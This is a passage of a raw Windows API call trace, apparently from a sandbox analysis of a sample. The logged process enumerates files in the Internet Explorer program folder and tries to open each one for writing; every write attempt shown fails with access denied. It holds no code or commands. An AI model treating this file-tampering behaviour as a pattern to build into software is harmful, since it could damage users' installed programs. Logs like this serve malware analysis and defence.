InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d0a0 [0089.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0089.517] AreFileApisANSI () returned 1 [0089.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0089.517] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x466d8 [0089.517] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x466d8, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\ExtExport.exe") returned 49 [0089.517] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ExtExport.exe" (normalized: "c:\\program files\\internet explorer\\extexport.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.518] GetFileType (hFile=0x360) returned 0x1 [0089.518] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x466d8 | out: hHeap=0x20000) returned 1 [0089.518] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.518] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.518] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.518] CloseHandle (hObject=0x360) returned 1 [0089.519] AreFileApisANSI () returned 1 [0089.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0089.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46358 [0089.519] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53298, cbMultiByte=-1, lpWideCharStr=0x46358, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\ExtExport.exe") returned 49 [0089.519] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\ExtExport.exe" (normalized: "c:\\program files\\internet explorer\\extexport.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.519] GetLastError () returned 0x5 [0089.519] GetLastError () returned 0x5 [0089.519] SetLastError (dwErrCode=0x5) [0089.519] GetLastError () returned 0x5 [0089.519] SetLastError (dwErrCode=0x5) [0089.519] GetLastError () returned 0x5 [0089.519] SetLastError (dwErrCode=0x5) [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46358 | out: hHeap=0x20000) returned 1 [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0089.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.519] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.519] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a9b1003, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a9b1003, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a9b1003, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0xd400, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="hmmapi.dll", cAlternateFileName="")) returned 1 [0089.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0089.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0089.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0089.519] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0089.519] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0089.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0089.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cf50 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a4b0 [0089.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cf50 | out: hHeap=0x20000) returned 1 [0089.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71b68 [0089.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a4b0 | out: hHeap=0x20000) returned 1 [0089.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0089.520] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0089.520] AreFileApisANSI () returned 1 [0089.520] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\hmmapi.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\hmmapi.dll", lpUsedDefaultChar=0x0) returned 46 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0089.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.520] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0089.520] AreFileApisANSI () returned 1 [0089.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0089.520] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x717c0 [0089.520] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x717c0, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 46 [0089.521] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.521] GetFileType (hFile=0x360) returned 0x1 [0089.521] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x717c0 | out: hHeap=0x20000) returned 1 [0089.522] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.522] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.522] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.522] CloseHandle (hObject=0x360) returned 1 [0089.522] AreFileApisANSI () returned 1 [0089.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0089.522] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0089.522] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4df18, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\hmmapi.dll") returned 46 [0089.522] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\hmmapi.dll" (normalized: "c:\\program files\\internet explorer\\hmmapi.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.522] GetLastError () returned 0x5 [0089.522] GetLastError () returned 0x5 [0089.523] SetLastError (dwErrCode=0x5) [0089.523] GetLastError () returned 0x5 [0089.523] SetLastError (dwErrCode=0x5) [0089.523] GetLastError () returned 0x5 [0089.523] SetLastError (dwErrCode=0x5) [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0089.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.523] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.523] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2a49fe45, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x2a49fe45, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x2a49fe45, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x7d000, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="iediagcmd.exe", cAlternateFileName="")) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34f50 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34f50 | out: hHeap=0x20000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6ce48 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ce48 | out: hHeap=0x20000) returned 1 [0089.523] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0089.523] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76110 [0089.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76110 | out: hHeap=0x20000) returned 1 [0089.524] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.524] AreFileApisANSI () returned 1 [0089.524] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\iediagcmd.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\iediagcmd.exe", lpUsedDefaultChar=0x0) returned 49 [0089.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0089.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.524] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0089.524] AreFileApisANSI () returned 1 [0089.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0089.524] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x45e88 [0089.524] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x45e88, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\iediagcmd.exe") returned 49 [0089.524] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iediagcmd.exe" (normalized: "c:\\program files\\internet explorer\\iediagcmd.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x360 [0089.525] GetFileType (hFile=0x360) returned 0x1 [0089.525] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x45e88 | out: hHeap=0x20000) returned 1 [0089.525] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0089.525] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0089.525] SetFilePointerEx (in: hFile=0x360, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0089.526] CloseHandle (hObject=0x360) returned 1 [0089.526] AreFileApisANSI () returned 1 [0089.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 49 [0089.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x62) returned 0x46048 [0089.526] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53400, cbMultiByte=-1, lpWideCharStr=0x46048, cchWideChar=49 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\iediagcmd.exe") returned 49 [0089.526] CreateFileW (lpFileName="C:\\Program Files\\Internet Explorer\\iediagcmd.exe" (normalized: "c:\\program files\\internet explorer\\iediagcmd.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0089.526] GetLastError () returned 0x5 [0089.526] GetLastError () returned 0x5 [0089.526] SetLastError (dwErrCode=0x5) [0089.526] GetLastError () returned 0x5 [0089.526] SetLastError (dwErrCode=0x5) [0089.526] GetLastError () returned 0x5 [0089.526] SetLastError (dwErrCode=0x5) [0089.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46048 | out: hHeap=0x20000) returned 1 [0089.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0089.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0089.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0089.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.526] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.526] FindNextFileW (in: hFindFile=0x78410, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4a70c9a1, ftCreationTime.dwHighDateTime=0x1d2fa08, ftLastAccessTime.dwLowDateTime=0xbc534b5e, ftLastAccessTime.dwHighDateTime=0x1d2fa09, ftLastWriteTime.dwLowDateTime=0x4a70c9a1, ftLastWriteTime.dwHighDateTime=0x1d2fa08, nFileSizeHigh=0x0, nFileSizeLow=0x7a800, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ieinstal.exe", cAlternateFileName="")) returned 1 [0089.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0089.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0089.526] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0089.526] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x351f0 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x351f0 | out: hHeap=0x20000) returned 1 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d210 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x76) returned 0x6a3b0 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d210 | out: hHeap=0x20000) returned 1 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6a3b0 | out: hHeap=0x20000) returned 1 [0089.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0089.527] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0089.527] AreFileApisANSI () returned 1 [0089.527] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Internet Explorer\\ieinstal.exe", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Internet Explorer\\ieinstal.exe", lpUsedDefaultChar=0x0) returned 48 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e308 [0089.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.527] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfc0 [0089.527] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0089.527] AreFileApisANSI () returned 1 [0089.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e308, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 48 [0089.528] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71550 [0089.528] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e308, cbMultiByte=-1, lpWideCharStr=0x71550, cchWideChar=48 | out: lpWideCharStr="C:\\Program Files\\Internet Explorer\\ieinstal.exe") returned 48 [0089.528] 